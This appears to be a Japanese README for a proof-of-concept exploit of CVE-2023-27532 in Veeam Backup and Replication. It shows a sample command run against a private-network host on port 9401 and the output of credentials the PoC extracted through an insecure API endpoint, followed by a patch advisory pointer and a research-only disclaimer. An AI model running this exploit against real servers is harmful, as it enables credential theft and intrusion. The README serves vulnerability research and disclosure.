
Veeam Backup and Replication CVE-2023-27532 の POC
CVE-2023-27532 に影響を受ける Veeam Backup and Replication の PoC
脆弱性の技術的な根本原因分析は、次のブログでご覧いただけます: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
この PoC は、安全でない API エンドポイントを悪用して認証情報を抽出します。
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
最新バージョンに更新するか、Veeam のアドバイザリに従って緩和措置を実施してください:
このソフトウェアは、学術研究および効果的な防御技術の開発のみを目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトメンテナは、ソフトウェアの誤用について責任を負いません。責任を持って使用してください。